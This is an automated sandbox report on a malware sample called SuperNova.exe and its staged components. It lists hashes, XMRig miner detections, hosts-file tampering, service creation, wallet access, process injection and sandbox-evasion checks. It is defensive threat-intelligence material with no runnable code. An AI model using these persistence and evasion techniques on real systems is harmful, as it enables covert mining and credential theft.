Analysis
-
max time kernel
1800s -
max time network
1755s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
27-06-2024 18:02
Behavioral task
behavioral1
Sample
CriticalFiles/SN.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
CriticalFiles/SNInstallerHandler.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
CriticalFiles/StageSN.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
InstHndl.dll
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
SuperNova.exe
Resource
win10v2004-20240611-en
General
-
Target
SuperNova.exe
-
Size
319KB
-
MD5
139874ded78aa99b323dba8eac9c9956
-
SHA1
b5baf7067dcb33b9679ec0188e27e93c3fd70369
-
SHA256
569f306077e35e7fbc449095ce624000939b8f27e68f6bcef908173675118ac9
-
SHA512
bc2bf447e8f06f8dbd3f55a1954ad6137abae2d3c57e471dc1d701ef3ae0dd2263a271af99c09b609b2eeb2c24548650182e1bc18ef75e78a0bf2b559006bc6b
-
SSDEEP
6144:Z4FLwAiLQyi6nn1VredEGZGa0Xv50evr1ChZ9bRPXlwAiLQT:ZILwAiG8f3GZ3Q1S9bR9wAiY
Malware Config
Signatures
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral5/memory/5856-316-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-317-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-313-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-315-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-314-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-311-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/5856-310-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4012 powershell.exe 3176 powershell.exe 5580 powershell.exe 1820 powershell.exe 2072 powershell.exe 4588 powershell.exe 5920 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 7 IoCs
Processes:
StageSN.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts StageSN.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SuperNova.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation SuperNova.exe -
Executes dropped EXE 14 IoCs
Processes:
CoinService.exerar.exe .scr .scr .scr .scr .scr .scr .scr .scr .exe .exerar.exerar.exepid process 5872 CoinService.exe 4824 rar.exe 2684 .scr 6060 .scr 3396 .scr 5596 .scr 2540 .scr 3292 .scr 4744 .scr 4904 .scr 4012 .exe 5928 .exe 6080 rar.exe 5980 rar.exe -
Loads dropped DLL 64 IoCs
Processes:
StageSN.exe .scr .scr .scrpid process 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 3444 StageSN.exe 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 6060 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 5596 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr 3292 .scr -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI47722\python310.dll upx behavioral5/memory/3444-32-0x00007FF95D510000-0x00007FF95D97E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_ctypes.pyd upx behavioral5/memory/3444-36-0x00007FF95F7F0000-0x00007FF95F814000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\libffi-7.dll upx behavioral5/memory/3444-39-0x00007FF96DE80000-0x00007FF96DE8F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47722\libssl-1_1.dll upx behavioral5/memory/3444-61-0x00007FF95E610000-0x00007FF95E63D000-memory.dmp upx behavioral5/memory/3444-63-0x00007FF95FAB0000-0x00007FF95FAC9000-memory.dmp upx behavioral5/memory/3444-65-0x00007FF95F9C0000-0x00007FF95F9DF000-memory.dmp upx behavioral5/memory/3444-68-0x00007FF95DCA0000-0x00007FF95DE11000-memory.dmp upx behavioral5/memory/3444-75-0x00007FF95E5C0000-0x00007FF95E5EE000-memory.dmp upx behavioral5/memory/3444-74-0x00007FF96D3C0000-0x00007FF96D3CD000-memory.dmp upx behavioral5/memory/3444-73-0x00007FF95E5F0000-0x00007FF95E609000-memory.dmp upx behavioral5/memory/3444-77-0x00007FF95D450000-0x00007FF95D508000-memory.dmp upx behavioral5/memory/3444-81-0x00007FF95D0D0000-0x00007FF95D445000-memory.dmp upx behavioral5/memory/3444-87-0x00007FF96C410000-0x00007FF96C41D000-memory.dmp upx behavioral5/memory/3444-86-0x00007FF95E5A0000-0x00007FF95E5B4000-memory.dmp upx behavioral5/memory/3444-85-0x00007FF95F7F0000-0x00007FF95F814000-memory.dmp upx behavioral5/memory/3444-80-0x00007FF95D510000-0x00007FF95D97E000-memory.dmp upx behavioral5/memory/3444-91-0x00007FF95CFB0000-0x00007FF95D0C8000-memory.dmp upx behavioral5/memory/5856-305-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-316-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-317-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-313-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-315-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-314-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-311-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-308-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-310-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-309-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-306-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/5856-307-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/3444-354-0x00007FF95F7F0000-0x00007FF95F814000-memory.dmp upx behavioral5/memory/3444-364-0x00007FF95D0D0000-0x00007FF95D445000-memory.dmp upx behavioral5/memory/3444-363-0x00007FF95D450000-0x00007FF95D508000-memory.dmp upx behavioral5/memory/3444-362-0x00007FF95E5C0000-0x00007FF95E5EE000-memory.dmp upx behavioral5/memory/3444-359-0x00007FF95DCA0000-0x00007FF95DE11000-memory.dmp upx behavioral5/memory/3444-353-0x00007FF95D510000-0x00007FF95D97E000-memory.dmp upx behavioral5/memory/3444-367-0x00007FF95CFB0000-0x00007FF95D0C8000-memory.dmp upx behavioral5/memory/3444-360-0x00007FF95E5F0000-0x00007FF95E609000-memory.dmp upx behavioral5/memory/3444-358-0x00007FF95F9C0000-0x00007FF95F9DF000-memory.dmp upx behavioral5/memory/3444-403-0x00007FF95E5C0000-0x00007FF95E5EE000-memory.dmp upx behavioral5/memory/3444-388-0x00007FF95D510000-0x00007FF95D97E000-memory.dmp upx behavioral5/memory/6060-540-0x00007FF95E130000-0x00007FF95E59E000-memory.dmp upx behavioral5/memory/6060-542-0x00007FF973A40000-0x00007FF973A4F000-memory.dmp upx behavioral5/memory/6060-541-0x00007FF96E2E0000-0x00007FF96E304000-memory.dmp upx behavioral5/memory/6060-547-0x00007FF96DFF0000-0x00007FF96E01D000-memory.dmp upx behavioral5/memory/6060-548-0x00007FF96EC20000-0x00007FF96EC39000-memory.dmp upx behavioral5/memory/6060-549-0x00007FF96EB40000-0x00007FF96EB5F000-memory.dmp upx behavioral5/memory/6060-550-0x00007FF95EA60000-0x00007FF95EBD1000-memory.dmp upx behavioral5/memory/6060-551-0x00007FF96DFD0000-0x00007FF96DFE9000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 ip-api.com 101 ip-api.com 137 ip-api.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 740 powercfg.exe 2732 powercfg.exe 2384 powercfg.exe 5600 powercfg.exe 3272 powercfg.exe 5548 powercfg.exe 5088 powercfg.exe 5392 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exeCoinService.exeSNInstallerHandler.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe CoinService.exe File opened for modification C:\Windows\system32\MRT.exe SNInstallerHandler.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
CoinService.exedescription pid process target process PID 5872 set thread context of 5804 5872 CoinService.exe conhost.exe PID 5872 set thread context of 5856 5872 CoinService.exe explorer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5984 sc.exe 5368 sc.exe 6128 sc.exe 2936 sc.exe 5404 sc.exe 5664 sc.exe 5140 sc.exe 3224 sc.exe 5008 sc.exe 4672 sc.exe 5904 sc.exe 1144 sc.exe 5964 sc.exe 5236 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 5124 WMIC.exe 4628 WMIC.exe 1116 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 12 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 4320 tasklist.exe 5328 tasklist.exe 4744 tasklist.exe 760 tasklist.exe 3148 tasklist.exe 5436 tasklist.exe 4532 tasklist.exe 3652 tasklist.exe 4524 tasklist.exe 2904 tasklist.exe 5708 tasklist.exe 1652 tasklist.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exesysteminfo.exepid process 5588 systeminfo.exe 1364 systeminfo.exe 2932 systeminfo.exe -
Modifies Control Panel 4 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\Desktop\ScreenSaveTimeOut = "900" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\Desktop rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\PROGRA~3\\MICROS~1\\Windows\\STARTM~1\\Programs\\StartUp\\DDF7~1.SCR" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\Desktop\ScreenSaveActive = "1" rundll32.exe -
Modifies data under HKEY_USERS 50 IoCs
Processes:
powershell.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 1 IoCs
Processes:
taskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SNInstallerHandler.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeCoinService.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exepid process 4168 SNInstallerHandler.exe 1820 powershell.exe 1820 powershell.exe 4092 powershell.exe 4092 powershell.exe 2072 powershell.exe 2072 powershell.exe 4588 powershell.exe 4588 powershell.exe 1820 powershell.exe 1820 powershell.exe 4092 powershell.exe 4092 powershell.exe 2072 powershell.exe 4588 powershell.exe 4588 powershell.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 5380 powershell.exe 5380 powershell.exe 5380 powershell.exe 4168 SNInstallerHandler.exe 5580 powershell.exe 5580 powershell.exe 4168 SNInstallerHandler.exe 5580 powershell.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 4168 SNInstallerHandler.exe 5872 CoinService.exe 5920 powershell.exe 5920 powershell.exe 5920 powershell.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5872 CoinService.exe 5816 powershell.exe 5816 powershell.exe 5816 powershell.exe 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe 5920 powershell.exe 5920 powershell.exe 2936 powershell.exe 2936 powershell.exe 5856 explorer.exe 5856 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 5812 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exetasklist.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1820 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4320 tasklist.exe Token: SeDebugPrivilege 3652 tasklist.exe Token: SeIncreaseQuotaPrivilege 3272 WMIC.exe Token: SeSecurityPrivilege 3272 WMIC.exe Token: SeTakeOwnershipPrivilege 3272 WMIC.exe Token: SeLoadDriverPrivilege 3272 WMIC.exe Token: SeSystemProfilePrivilege 3272 WMIC.exe Token: SeSystemtimePrivilege 3272 WMIC.exe Token: SeProfSingleProcessPrivilege 3272 WMIC.exe Token: SeIncBasePriorityPrivilege 3272 WMIC.exe Token: SeCreatePagefilePrivilege 3272 WMIC.exe Token: SeBackupPrivilege 3272 WMIC.exe Token: SeRestorePrivilege 3272 WMIC.exe Token: SeShutdownPrivilege 3272 WMIC.exe Token: SeDebugPrivilege 3272 WMIC.exe Token: SeSystemEnvironmentPrivilege 3272 WMIC.exe Token: SeRemoteShutdownPrivilege 3272 WMIC.exe Token: SeUndockPrivilege 3272 WMIC.exe Token: SeManageVolumePrivilege 3272 WMIC.exe Token: 33 3272 WMIC.exe Token: 34 3272 WMIC.exe Token: 35 3272 WMIC.exe Token: 36 3272 WMIC.exe Token: SeIncreaseQuotaPrivilege 3272 WMIC.exe Token: SeSecurityPrivilege 3272 WMIC.exe Token: SeTakeOwnershipPrivilege 3272 WMIC.exe Token: SeLoadDriverPrivilege 3272 WMIC.exe Token: SeSystemProfilePrivilege 3272 WMIC.exe Token: SeSystemtimePrivilege 3272 WMIC.exe Token: SeProfSingleProcessPrivilege 3272 WMIC.exe Token: SeIncBasePriorityPrivilege 3272 WMIC.exe Token: SeCreatePagefilePrivilege 3272 WMIC.exe Token: SeBackupPrivilege 3272 WMIC.exe Token: SeRestorePrivilege 3272 WMIC.exe Token: SeShutdownPrivilege 3272 WMIC.exe Token: SeDebugPrivilege 3272 WMIC.exe Token: SeSystemEnvironmentPrivilege 3272 WMIC.exe Token: SeRemoteShutdownPrivilege 3272 WMIC.exe Token: SeUndockPrivilege 3272 WMIC.exe Token: SeManageVolumePrivilege 3272 WMIC.exe Token: 33 3272 WMIC.exe Token: 34 3272 WMIC.exe Token: 35 3272 WMIC.exe Token: 36 3272 WMIC.exe Token: SeDebugPrivilege 5328 tasklist.exe Token: SeDebugPrivilege 5380 powershell.exe Token: SeDebugPrivilege 5580 powershell.exe Token: SeDebugPrivilege 4744 tasklist.exe Token: SeShutdownPrivilege 740 powercfg.exe Token: SeCreatePagefilePrivilege 740 powercfg.exe Token: SeShutdownPrivilege 2732 powercfg.exe Token: SeCreatePagefilePrivilege 2732 powercfg.exe Token: SeShutdownPrivilege 5392 powercfg.exe Token: SeCreatePagefilePrivilege 5392 powercfg.exe Token: SeShutdownPrivilege 5088 powercfg.exe Token: SeCreatePagefilePrivilege 5088 powercfg.exe Token: SeDebugPrivilege 5920 powershell.exe Token: SeShutdownPrivilege 2384 powercfg.exe Token: SeCreatePagefilePrivilege 2384 powercfg.exe Token: SeLockMemoryPrivilege 5856 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exe7zG.exepid process 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 4524 7zG.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe 5812 taskmgr.exe -
